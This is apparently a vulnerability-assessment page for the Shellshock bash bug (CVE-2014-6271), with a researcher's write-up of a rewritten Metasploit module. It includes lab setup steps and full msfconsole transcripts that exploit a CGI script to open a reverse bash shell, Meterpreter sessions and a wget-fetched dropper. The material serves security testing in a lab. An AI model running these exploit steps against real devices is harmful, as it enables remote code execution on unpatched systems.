Very High
CVE-2014-6271
CVE-2014-6271
Description
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Add Assessment
Technical Analysis
An Golden Oldie from 2014 that is still very relevant nowadays.
In my recent research of security vulnerabilities, I bumped into several targets that were still vulnerable to CVE-2014-6271 a.k.a. Shellshock and CVE-2014-6278. You should not be surprised that most of these targets are IoT based with an embedded Linux/Unix image running a vulnerable bash version. They typically do not get updated at all and are easy targets for a malicious actor to find an entry point into the network.
Metasploit modules like exploit/multi/http/apache_mod_cgi_bash_env_exec, are pretty restricted to launch an attack due to the limited platform support (only x86) and payloads that can be leveraged in an attack. This brought me to rewrite this module a bit so that it would support multiple platforms (ARM, x86, x64, MIPS) and multiple payloads such as Unix command and Linux Dropper. The module name is multi/http/bash_env_cgi_rce.
To test the module locally, you download a vulnerable bash version from https://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz. Any version published before September 2014 is okay. Just extract it in a local directory and compile it with ./configure && make.
Configure an Apache or any other preferred web server to support CGI scripts. You can find tons of instructions on the web how to do that.
Just create a script like below using the vulnerable bash version and add this to the cgi-bin directory of your preferred web server.
#!/bin/bash_CVE_2014_6271 echo "Content-type: text/plain" echo echo echo "Hello World"
Download module from here and follow the install instructions.
Start msfconsole and play around with the different options and payloads.
msf6 > use exploits/multi/http/bash_env_cgi_rce [*] Using configured payload cmd/unix/reverse_bash msf6 exploit(multi/http/bash_env_cgi_rce) > options Module options (exploit/multi/http/bash_env_cgi_rce): Name Current Setting Required Description ---- --------------- -------- ----------- CVE Automatic yes CVE to check/exploit (Accepted: Automatic, CVE-2014-62 71, CVE-2014-6278) HEADER User-Agent yes HTTP header to use METHOD GET yes HTTP method to use PAYLOADSIZE 2048 yes Payload size used by the CmdStager Proxies no A proxy chain of format type:host:port[,type:host:port ][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/do cs/using-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI yes Path to CGI script URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This mus t be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. Payload options (cmd/unix/reverse_bash): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Unix Command View the full module info with the info, or info -d command. msf6 exploit(multi/http/bash_env_cgi_rce) > set rhosts 192.168.201.10 rhosts => 192.168.201.10 msf6 exploit(multi/http/bash_env_cgi_rce) > set targeturi /cgi-bin/test.cgi targeturi => /cgi-bin/test.cgi msf6 exploit(multi/http/bash_env_cgi_rce) > check [*] Target is vulnerable for CVE-2014-6271. [*] Target is vulnerable for CVE-2014-6278. [+] 192.168.201.10:80 - The target is vulnerable. msf6 exploit(multi/http/bash_env_cgi_rce) > set lhost 192.168.201.10 lhost => 192.168.201.10 msf6 exploit(multi/http/bash_env_cgi_rce) > set lport 4444 lport => 4444 msf6 exploit(multi/http/bash_env_cgi_rce) > exploit [*] Started reverse TCP handler on 192.168.201.10:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Target is vulnerable for CVE-2014-6271. [*] Target is vulnerable for CVE-2014-6278. [+] The target is vulnerable. [*] Executing Unix Command for cmd/unix/reverse_bash using vulnerability CVE-2014-6271. [*] Command shell session 1 opened (192.168.201.10:4444 -> 192.168.201.10:35766) at 2023-05-21 15:01:17 +0000 id uid=33(www-data) gid=33(www-data) groups=33(www-data) uname -a Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
Python Meterpreter payload example
msf6 exploit(multi/http/bash_env_cgi_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp payload => cmd/unix/python/meterpreter/reverse_tcp msf6 exploit(multi/http/bash_env_cgi_rce) > exploit [*] Started reverse TCP handler on 192.168.201.10:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Target is vulnerable for CVE-2014-6271. [*] Target is vulnerable for CVE-2014-6278. [+] The target is vulnerable. [*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp using vulnerability CVE-2014-6271. [*] Sending stage (24772 bytes) to 192.168.201.10 [*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.10:35678) at 2023-05-21 15:03:48 +0000 meterpreter > sysinfo Computer : cerberus OS : Linux 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) Architecture : aarch64 Meterpreter : python/linux meterpreter > getuid Server username: www-data meterpreter >
Linux File dropper using payload: linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > set target 1 target => 1 msf6 exploit(multi/http/bash_env_cgi_rce) > set payload linux/aarch64/meterpreter_reverse_tcp payload => linux/aarch64/meterpreter_reverse_tcp msf6 exploit(multi/http/bash_env_cgi_rce) > set CMDSTAGER::FLAVOR wget CMDSTAGER::FLAVOR => wget msf6 exploit(multi/http/bash_env_cgi_rce) > exploit [*] Started reverse TCP handler on 192.168.201.10:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Target is vulnerable for CVE-2014-6271. [*] Target is vulnerable for CVE-2014-6278. [+] The target is vulnerable. [*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp using vulnerability CVE-2014-6271. [*] Using URL: http://192.168.201.10:8080/ZzirBKe [*] Client 192.168.201.10 (Wget/1.21.3) requested /ZzirBKe [*] Sending payload to 192.168.201.10 (Wget/1.21.3) [*] Meterpreter session 3 opened (192.168.201.10:4444 -> 192.168.201.10:34346) at 2023-05-21 15:10:11 +0000 [*] Command Stager progress - 100.00% done (114/114 bytes) [*] Server stopped. meterpreter > sysinfo Computer : 192.168.201.10 OS : Debian (Linux 5.15.44-Re4son-v8l+) Architecture : aarch64 BuildTuple : aarch64-linux-musl Meterpreter : aarch64/linux meterpreter > getuid Server username: www-data meterpreter >
If you use CMDSTAGER::FLAVOR option bourne or printf, please ensure that your payload size is 2048 or below.
You can control this with the option PAYLOADSIZE
Have fun !!!
References
CVSS V3 Severity and Metrics
General Information
Metasploit Modules
References
Miscellaneous
